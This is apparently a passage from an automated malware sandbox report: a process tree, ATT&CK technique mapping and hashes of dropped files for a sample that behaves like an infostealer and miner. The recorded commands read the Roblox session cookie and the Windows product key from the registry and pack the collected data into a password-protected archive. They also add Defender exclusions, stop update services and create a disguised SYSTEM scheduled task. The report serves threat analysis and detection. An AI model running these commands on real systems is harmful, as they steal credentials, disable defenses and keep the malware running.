        
        tree /A /F
        9⤵
        
        PID:5372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5388
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:5648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:6012
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:6112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:6056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10682\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\HSFk6.zip" *"
        8⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\_MEI10682\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI10682\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\HSFk6.zip" *
        9⤵
        Executes dropped EXE
        
        PID:6380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:6520
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        
        PID:6568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:6736
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:6788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:6824
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:6880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:6944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:7348
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:7400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:7448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8484
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:8852
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:8880
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:8896
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8908
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:8932
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:8944
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:8968
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9004
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:2616
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9704
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5348
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6216
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:7312
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7324
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7136
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7288
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6944
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:7420
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:7364
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:7632
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:7656
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7644
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:8292
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:8416

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:1628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4008

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4620

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1636

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:804

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:3640

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:1600

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:4956

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:10236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\Microsoft\based.exe

Filesize
7.5MB

MD5
d9eb7fd115d5322c87c2cd11a99df343

SHA1
301bb836ed92f5bca358e6da08d824135c01608f

SHA256
0d1ff13243b82490d62f820a83e8ff834270ef8f847c85d0f567fe401dfd90d8

SHA512
2f7ac5f85e46cd51f6a3796961f7291126028eee89f04c8e16198914ea92aa824d42b532578d8845ad4a538e4832e3520c88220ae76f3db8f78001576b3f9978

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
70d8f32540470db5df9d39deed7bd6cb

SHA1
a14147440736d4f1427193cd206f519890b9f2f2

SHA256
858bdc7b94a957a182492a2d21e096b2fb2ab5317ae9e3e882243ad80953227e

SHA512
522fc6bc180c5e9e7bc60ece7404162692f0a7902923465082cf5449bc9d2f247b8e7d60f7f0bf5a24bf98fc07826b743a49b71eba406f6073990c3355944870

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\Build.exe

Filesize
31.6MB

MD5
08e1038e4d9273b8100d577e526dc44c

SHA1
99adb811149a471494cf072f57d9b5d8b9824673

SHA256
db9a6c0ecd67af93aa714c81d6e13e01d9cec44088cd1eef19d6311ba9fe318b

SHA512
c6c59e295f88651799173c110cd4ee655f9a4345ef53c7a739e5ec2b97bba04b4c7d82a90d7677869d477d7af1cd7b7671a3c70bea173b3c6c97d7386ef18c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_bz2.pyd

Filesize
48KB

MD5
83b5d1943ac896a785da5343614b16bc

SHA1
9d94b7f374030fed7f6e876434907561a496f5d9

SHA256
bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

SHA512
5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_decimal.pyd

Filesize
106KB

MD5
0cfe09615338c6450ac48dd386f545fd

SHA1
61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

SHA256
a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

SHA512
42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_hashlib.pyd

Filesize
35KB

MD5
7edb6c172c0e44913e166abb50e6fba6

SHA1
3f8c7d0ff8981d49843372572f93a6923f61e8ed

SHA256
258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

SHA512
2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_lzma.pyd

Filesize
85KB

MD5
71f0b9f90aa4bb5e605df0ea58673578

SHA1
c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

SHA256
d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

SHA512
fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_socket.pyd

Filesize
43KB

MD5
57dc6a74a8f2faaca1ba5d330d7c8b4b

SHA1
905d90741342ac566b02808ad0f69e552bb08930

SHA256
5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

SHA512
5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-console-l1-1-0.dll

Filesize
11KB

MD5
503107c27112ec911cfb4d9036e9ba2d

SHA1
565380e9a5f47634a9aed83ba8154895bde976d3

SHA256
f0662c9566ef712112a85a7fd11c96ad296a9571bd6953a756440186baaadb9d

SHA512
6e63cc5f8d459fed7324caabcafea156d6e73e85b2016f5e8691f0bf885bdad368e1ccf7c7c468144b6459ef72d8eb4a194aabdeba4fcd34d0a7e9338176f2ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-datetime-l1-1-0.dll

Filesize
10KB

MD5
9d57e52ae71ed1c5d43f34848e40e7cb

SHA1
b53659a4f2a49b0605d171496e92482dccf9c616

SHA256
3f4fcc14e6d126bb6ec6ccc1f91632039c884916f1d2e4c03cedb6b6dd8ef85e

SHA512
0470a5b6d509f8df7c918a8516875980104c4a98d13dbee8188cb388d7c6687f71793fe5a7ea76042dd48040c5678301f4c7e910e965aa4dbf1727581c46b33e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-debug-l1-1-0.dll

Filesize
10KB

MD5
f060bcb3c78c0cf55ec3785bc5883d23

SHA1
72fe582ef0469ccb42207f187fa4ea605badedd1

SHA256
203f3714e7d67970c7a31712d5ccd2fcd7b81806f33d35d214332aebab3b1860

SHA512
7fac846c391a750daf7e427441e6901c3805eefc6a0e4ee0d308f9e40dd1c1398a0b0abc0b320f66c2f336b683fba64a825c23c4ae0dfcd56ade3f7e227406d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
10KB

MD5
a73aab5ab512561781b64aef0fb35cb4

SHA1
386fc125dc8a75c5b22f624427a2692b05cf96db

SHA256
a8df626c1cf5a8b1674b80152c0f918b0614d3bde2187beb620845f35a6eb2e7

SHA512
2d409f259dd26f3fb6d6033789d6b312a8b09ea1aa8d12a73ac7cf7d070273c36f674b6711d0109ffe891778de8e3913b0bfa32464d1c323ff1cb4b1d9892032

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-file-l1-1-0.dll

Filesize
14KB

MD5
ce6a226c3c6311ce8eb8a0fcf88088b5

SHA1
ff3b1c5aba77fd77f1a6e1605dcffa26422e0076

SHA256
a86f39bc492e9de3fb570d0836b0d6d07b642ffa63f0410298161134af7c898b

SHA512
3e9d28f10108e2cff08a02082035f0f7caec60dd57ea004f6862d2958bcfbb378a5d6172ce152ca9727a7263125f97a5c8a1810e5de61902a3536bed56a78085

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-file-l1-2-0.dll

Filesize
10KB

MD5
e6b0bfdc2a7d1f78ef3d1396ffc4bdc4

SHA1
eeba46491e45d08c114f20c62e46149b2451e311

SHA256
0377bc9cb4b16f1a9542b0b6879de48e9f5b6731a231bbf47087b025596e25a5

SHA512
f903e2efb8b4e6195d4218adbd5dc491e2c83e5c943f0ef34e9575b7398e8e9cfdbada8933ab91dcc45a32e480e9b745e664951114b2511a79b3419bb5f4bdb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-file-l2-1-0.dll

Filesize
10KB

MD5
327b8dbe3e777c74a38cf00efaddecea

SHA1
67c3ce374c22a2e02b46fd90b18307519c41f419

SHA256
0a7e52e026b508bf15d467bba217fec9667a059885d30b1f76de94e29ed4c0bc

SHA512
e1495c0c026311f19680da93e73d373eec64253f808ec4346597e2f45a91cedcc693cb5fdd95569fa8cdfcc5a7bce79357a95c0a08fb0618d76d68089f43000e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-handle-l1-1-0.dll

Filesize
10KB

MD5
eb957e8261032210713e41ad5b337d2e

SHA1
8a7c017062e012c32e176083c8ffa7844d71d200

SHA256
2ebf7be5a6354058e59bfcc79b7ef6bce71e7023f14c511caafe64554c23c9f4

SHA512
94e2f61d05d3660fca944fbd095f0ff8749650439125e82173526438a61c1aa95c9bb7cdd9f28ab833b994823acaf0089d0257f2a6c69a6ff47f27736d901596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-heap-l1-1-0.dll

Filesize
11KB

MD5
c6b13314244d6e3e0105d9629cb09557

SHA1
c381a27559662ae4ebbdbf3cb6de51cafdd31040

SHA256
0bf07d463810f879d8df1223f4d0b20973ecf8b26823cf098782a610e27df5df

SHA512
84f4bca6693ca3a5e23b436b3b0cc499d4cf2f15b6d711ce52dc393cd8cf3dc7309b2d870560119ef7df566e0e8941ddb550d2598e53fd41fcfc7bcee9031395

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
10KB

MD5
69cdcb563ee8d09e36e79fd28602b183

SHA1
dd9dd9fd076b16ece4a8af7316500db22d4e40ce

SHA256
9a2e5288bafaab45b15123b7ed6237c7b4563c6d74cdc759dcd9eee8a5ef4691

SHA512
d4655d8f1db40e781f910e1739258035f4d7e2b4af17a7127f06596362b0320dfd0dced7e2d2c8dcac542335dbe15a4c82aa2d410bbdcf371896d562964ad628

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
11KB

MD5
464b832650ac3772d438465d879f67f8

SHA1
cced7541a2815683a909826d7dc38cccff4f331f

SHA256
687f9ed37741b96db498e64a5ab870cfa64365b2a3a405cc3165d3f56818101a

SHA512
f9e5b5bde2327a0a06bf1cf455a5b271cbad4f81e960b626f4e7352d4435a4c3794761988a7ab7ec44c4d4ee68518e5cf5e8a9f7758547d298a6e07e8f458e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-localization-l1-2-0.dll

Filesize
13KB

MD5
30e30760b6dac6bcd78a609b4c9ad289

SHA1
1a35b6d6d9647701c2998c4f1462def9a745af3a

SHA256
62e13dfa9eda56d7b46328f05f8b3c8144f9a777fe80812fddc2a7b855372bc7

SHA512
216352f7cacdd650f679f9b10acbf8560e9ab85e0547e07996eadd96a04885fe0d8671a32666013dd3cb20f771734136916ab67c68a0f670ce591125eca4e4e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-memory-l1-1-0.dll

Filesize
11KB

MD5
0b9892da162b21233a01bbbb4b81652f

SHA1
2082d040c6604952fb9bbb4e363405b6d2e8d44c

SHA256
bb745558e622125cfea142d38c5ef1c3649a373bce1aa01d3e8f8dbfe0868d58

SHA512
97b5f27e77144fbba22ad0412e911922cd03756a0d7a424666c4b25e5623bdb0b1e927a49d24574046df9077918a8e96914f7b595dd3ffaed90bae497eace3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
10KB

MD5
d5f7756fc41d532facce6b3ee29a31ba

SHA1
e69112442ef9bfc19ae72d54a698412c4c84f6d9

SHA256
78baca9c25f810a2412d7b6666adbb3e243804c2d81afaf8445780713b4f53d9

SHA512
3ce437bfb4a57ba50f5f9701509e52841c79ca0eadd360c9505994d6232b2c226386573ac026848be8f77d1870131e963483ccd38fcac464511a4203ee5d4b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
11KB

MD5
d339b7d39cf45b8897b9969c421e905a

SHA1
2feb095a1313d2f0c6b1fe93d7122b70242a5947

SHA256
655f58ac5e386a55e8a16beb9df6a1f146c688b84637396f7a618b4ce7389728

SHA512
52454636d441905901c58a67e3129ee8e9806e109a8100e5866de3cf27392cc5f4611622baf697ac3900258b9cf6229827229174efe4ae8041db9f90b8b6ab97

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
12KB

MD5
811212517eb46d8fc1e2f07e7d6ff53e

SHA1
9bf10f90e45216098371b7b73270db036935ca91

SHA256
8db297037c3c60f7c3bd5f363b62c57a74a468a25771da62496b2f3c51a88f0a

SHA512
6f0bfcfdd97007e989d29d64661743d1717d3f12101629c7d49e8d65cd319fc5ded5679046cb37cc2f9ce4ae8af3be222d842e2d256a26616c90d60ab4e4c458

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
11KB

MD5
febccad96bebeab0a0fba7d8be5b8472

SHA1
bf6e2a548a312496539e1780aac5653c134659cd

SHA256
691443c7db5c0e499a6a85363a2f8f4c97e93de378e36d307742b6acd3bc4fe5

SHA512
802db20a82432fcd955d1ae4fa791fe74ba464832a4bb4c3a6400a19d075e847acff475446d7756bd7c752937742f6505df4fe7152056e335af21d3e289607c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-profile-l1-1-0.dll

Filesize
10KB

MD5
32c5ad65616c74ec872a712804d10a14

SHA1
0eb6dca10c0aa5a87665721405287157adf7d396

SHA256
fdeca8d1b88cae03a11fb5a86e7782632fb04e986dc7a6f86653daf54f78c811

SHA512
a16d7d9c0877ff0094e3fefa16347761077812eec8f872e70fb26e689a6beec802258b71d7e3b32d5db82dc7815d3d8f47c9651a48b28fef6cef8fffe8c6b10d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
11KB

MD5
5e64dc563fead265c956bea86d4672ef

SHA1
b65f9ddb024ebd4da0d3da906479656fc84f1437

SHA256
aa09ec5625a16af3036391e699ef424da4a12ba3b78295c184f612781e22520d

SHA512
063fa4e344a73343344ead1dd010af31da6f4626271a4d4fc5289d707d9b545b05ac5ace36604c52191b5c8956a9c9938e540c25289f9abba9a0bd5859b90108

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-string-l1-1-0.dll

Filesize
10KB

MD5
063deb74c0f0b59ff8e172fce1c3df53

SHA1
7db0692bccb9d30bc4dbf6599b6d458276751442

SHA256
c21ccfd076bfedb61db51f98ae6b70b7a907d85c72c4a9b0e5599f0dc96c5a65

SHA512
d7be3da3772d7e5cdf3707d2ca36e1f9eace2acbf55676fee245fc489069221fe35ba5c72d5e039c3411e68b3a5d938a09aa3ad4cdfe22211a2613ce3a072cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-synch-l1-1-0.dll

Filesize
12KB

MD5
4f19373713d1641a4f507c836652d3bf

SHA1
558b99b352839f36060d032f1494f99ada3fa7ec

SHA256
07cb1bfa10271e007cb62fea7e801a120d2b09aeb300ddc151ea001abebf88ef

SHA512
5e1a9acae35c8ab1b8fc621287f009969f0e8c66856ccdd3889c520be99588eca0b360e4c1a864985ae19d1e1db4533deb45e33d19681d5bcfae0d76877cc614

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-synch-l1-2-0.dll

Filesize
11KB

MD5
38c585bf458859da397d267e14fd81d8

SHA1
110af52a99e3c98e600890e5c0b2c5dad7412d74

SHA256
a1b17f63f01aecaa21d085bd3462f827c41c271bf1608da18b52447e4bb38c01

SHA512
21458b6de7277d1d34727bf12e26a7c936b34a422286e4c42238e80f8a6c39a2889272276e089bc45ac3342b50d973c8287e239192bf199923473b450d8a2b84

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-sysinfo-l1-1-0.dll

Filesize
11KB

MD5
760b2155d579aec44965558418e34202

SHA1
1f4106ef71ea6976b28bf54342a800676460faed

SHA256
a0646f19637e83a788bd7d847e88ee767eefa492da18abe3909c8bdee000e105

SHA512
f43c0434b1240ab611d6a3361c53c212f529a232c5487c0b09835dce23e04ffd026a361ee42b5274e697a8d3de61caa4426ed25434fced9a13e62e6798198a54

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-timezone-l1-1-0.dll

Filesize
11KB

MD5
aecf6fb286ebb136b20e2b08f129d6dd

SHA1
a77ead7b9af5720001536a673047050ca0776e25

SHA256
8c16e98f5f9137c8321a8df4d336750df529e151dd16b636b0ded00c8662d0ab

SHA512
402539733a80c00d5f8150a470b7099bca05822486517af9d0cfa7267118cc74611980963f716b354ca2c868892a537ef2dcb65c2c76991579c4611c1cdadbc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-core-util-l1-1-0.dll

Filesize
10KB

MD5
df9128399b4b45d91d3568cb9f03f541

SHA1
f602c995c16302de13d965601380299db5054a00

SHA256
71afa7371be8b0e57d9a8981856d73d619ef8ede9e521b5965028a4d27c81ada

SHA512
8d37626d785035da042000b89e6c3acaedd46d6b6f305a55156d54e7b9a640e9b3393be1213160833cc8b662867e76039a993e9b1ee04b45002199edbde2f8dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20042\api-ms-win-crt-conio-l1-1-0.dll

Filesize
11KB

MD5
9a657472b63bbc23374ff79651250efd

SHA1
